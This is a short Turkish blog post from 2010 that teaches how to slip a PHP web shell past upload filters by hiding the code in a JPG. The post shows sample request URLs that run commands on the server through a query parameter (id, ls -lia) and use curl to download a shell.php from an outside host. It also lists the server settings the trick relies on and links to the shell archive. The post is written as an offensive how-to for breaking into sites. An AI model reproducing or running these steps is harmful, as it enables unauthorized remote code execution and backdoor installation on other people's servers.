11 Aralık 2010 Cumartesi

local bypass jpg shell code injection

Her upload yapılabilen sitelerden shell sokamazsınız çogu yer .php uzantıları yasaklar buna karşılık bu shelli kullanabilirsiniz... kesin olarak bu jpg dosyalarını attıgınızda shell sokamazsınız ama işe yaradıgını bizzat kendim test ederek gördüm.. Upload olan siteden sunucumuza verdigim jpg uzantılı shelleri yükleyip  yüklendigi yerleri bulduktan sonra

byege.blogspot.com/uploadyolu/ege_passthru.jpg?ege=id
byege.blogspot.com/uploadyolu/ege_passthru.jpg?ege=ls -lia
byege.blogspot.com/uploadyolu/ege_passthru.jpg?ege=curl -o shell.php shelladresi.com/shell.txt gibi linux komutları ile shell yüklüyebiliriz..
burda  yapılan işlem resmin içine php kodu saklıyarak ufak bir 4 kb resim dosyasının içindeki  php kodlarla sunucuda code injection yapmaktır bu işlemi yapabilmek içinde Safe Mode : Off  ve  sunucuda system ile passthru fonksionlarının aynı zamanda fopen açık olması lazım..

Dosya Download Link : http://www.dosya.tc/download/UECzwH/ege_jpg_shell.rar.html

Windows 98 işletim sistemi kullananlar yorum olarak adresini yazsın

2 yorum :